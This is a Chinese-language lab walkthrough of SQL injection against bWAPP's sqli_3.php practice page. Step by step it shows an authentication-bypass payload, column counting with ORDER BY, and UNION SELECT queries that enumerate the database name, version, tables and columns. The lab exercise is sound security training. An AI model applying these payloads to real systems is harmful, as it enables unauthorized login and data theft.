SQL注入之bWAPP之sqli_3.php
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入之bWAPP之sqli_3.php相关的知识,希望对你有一定的参考价值。
1、首先在login框中输入一个单引号看看有什么结果,结果如图:
仔细一看,报错内容中的“AND”前有四个单引号,说明我们输入的一个单引号正好和代码前的单引号闭合了。
2、尝试构造万能密码,尝试输入
“login=1‘ or 1=1 --+
&password=
&form=submit”,好像不对,在尝试输入
“login=1‘ or 1=1 #+
&password=
&form=submit”,对了,结果如图:
3、判断字段数并查看显示位:
输入“login=1‘ order by 5 #+”,报“Error: Unknown column ‘5‘ in ‘order clause‘”,输入“login=1‘ order by 4 #+”,报“Invalid credentials!”,说明字段是4,结果如图:
输入“login=-1‘ union select 1,2,3,4 #+”,结果如图:
4、查看数据库等信息:
输入“login=-1‘ union select 1,database(),3,group_concat(version(),"||",user()) #+”,得知数据库名为Bwapp,结果如图:
5、查询表名:
输入“login=-1‘ union select 1,database(),3,table_name from information_schema.tables where table_schema=‘Bwapp‘ #+”,得知表名为Blog,结果如图:
6、查询字段名:
输入“login=-1‘ union select 1,database(),3,column_name from information_schema.columns where table_name=‘Blog‘ #+”,得知字段名为Id,结果如图:
7、查询字段内容:
输入“login=-1‘ union select 1,database(),3,id from Blog #+”,没有数据。
以上是关于SQL注入之bWAPP之sqli_3.php的主要内容,如果未能解决你的问题,请参考以下文章